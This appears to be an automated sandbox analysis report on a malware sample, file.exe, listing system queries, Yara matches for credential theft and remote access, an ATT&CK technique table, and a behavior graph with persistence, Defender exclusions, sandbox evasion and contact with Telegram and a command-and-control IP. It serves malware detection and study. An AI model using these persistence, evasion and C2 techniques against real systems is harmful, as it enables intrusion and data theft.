Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\file.exe Queries volume information: C:\Users\user\AppData\Roaming\file.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\file.exeQueries volume information: C:\Users\user\AppData\Roaming\file.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: Amcache.hve.29.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                            Source: Amcache.hve.29.drBinary or memory string: msmpeng.exe
                            Source: Amcache.hve.29.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                            Source: Amcache.hve.29.drBinary or memory string: MsMpEng.exe
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: file.exe, type: SAMPLE
Source: Yara match | File source: 0.2.file.exe.5e50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.5e50000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.2.WindowsUpdaterConf.exe.42d42a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.4172310149.00000000042F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\WindowsUpdaterConf.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\file.exe, type: DROPPED
Source: Yara match | File source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 2852, type: MEMORYSTR
Source: Yara match | File source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4176352782.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 2852, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: file.exe, type: SAMPLE
Source: Yara match | File source: 0.2.file.exe.5e50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.5e50000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.2.WindowsUpdaterConf.exe.42d42a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.4172310149.00000000042F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\WindowsUpdaterConf.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\file.exe, type: DROPPED
Source: Yara match | File source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 2852, type: MEMORYSTR
Source: Yara match | File source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4176352782.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 2852, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (numbers preceding a technique name are the report's match-count badges, kept as shown)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 23 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 221 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 11 Obfuscated Files or Information | Security Account Manager | 541 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 221 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Virtualization/Sandbox Evasion | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 111 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 13 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 151 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1569488 | Sample: file.exe | Startdate: 05/12/2024 | Architecture: WINDOWS | Score: 100
(the behavior graph, flattened into a text tree; bracketed numbers after a process name are the node badges for created registry values / created files)

Start
  DNS/IP: api.telegram.org
    Signature: Uses the Telegram API (likely for C&C communication)
  DNS/IP: ip-api.com
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
  Process: file.exe [1 5] started
    Dropped: C:\Users\user\AppData\Roaming\file.exe, PE32
    Dropped: C:\Users\user\...\file.exe:Zone.Identifier, ASCII
    Dropped: C:\Users\user\AppData\Local\...\file.exe.log, CSV
    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Creates autostart registry keys with suspicious names; Creates multiple autostart registry keys; 6 other signatures
    Process: file.exe [16 6] started
      DNS/IP: 185.196.8.239, 49742, 7000 SIMPLECARRER2IT Switzerland
      DNS/IP: ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States
      DNS/IP: api.telegram.org 149.154.167.220, 443, 49740 TELEGRAMRU United Kingdom
      Dropped: C:\Users\user\WindowsUpdaterConf.exe, PE32
      Signatures: Protects its processes via BreakOnTermination flag; Creates multiple autostart registry keys; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Adds a directory exclusion to Windows Defender
      Process: powershell.exe [23] started
        Signature: Loading BitLocker PowerShell Module
        Process: conhost.exe started
      Process: powershell.exe [23] started
        Process: conhost.exe started
      Process: powershell.exe started
        Process: conhost.exe started
      3 other processes started
        Process: WindowsUpdaterConf.exe started
          Process: WerFault.exe started
        Process: conhost.exe started
        Process: conhost.exe started
    Process: cmd.exe [1] started
      Process: conhost.exe started
      Process: timeout.exe [1] started
  Process: file.exe started
    Signatures: Multi AV Scanner detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Process: WerFault.exe started
      Dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode
  Process: WindowsUpdaterConf.exe started
    Process: WerFault.exe started
  5 other processes started
    Process: WerFault.exe started
      Dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode
    Process: WerFault.exe started
    Process: WerFault.exe started
    Process: WerFault.exe started

